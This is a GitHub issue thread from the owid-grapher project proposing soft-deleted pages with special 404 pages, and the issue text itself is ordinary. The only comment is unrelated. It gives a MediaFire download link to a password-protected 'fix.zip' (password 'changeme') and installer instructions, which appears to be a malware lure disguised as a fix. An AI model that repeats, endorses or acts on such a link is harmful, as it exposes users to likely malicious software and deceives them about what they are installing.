### ISSUE TITLE
Add the ability to mark a page as deleted

### ISSUE THREAD

**Issue by rakyi** [owid/owid-grapher#3902]
For deleted content, i.e. content that should no longer show up at its old URL, we want to have an easy way to create special 404 pages.

* Allow both new soft delete and old actual delete of a page (current behavior)
* For new soft delete, allow users to specify:
  * An optional reason why we deleted the page
  * An optional link to a related page
* Implement the new page design
* Remove the page from search and sitemap

**Comment by paozhuanis1** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."
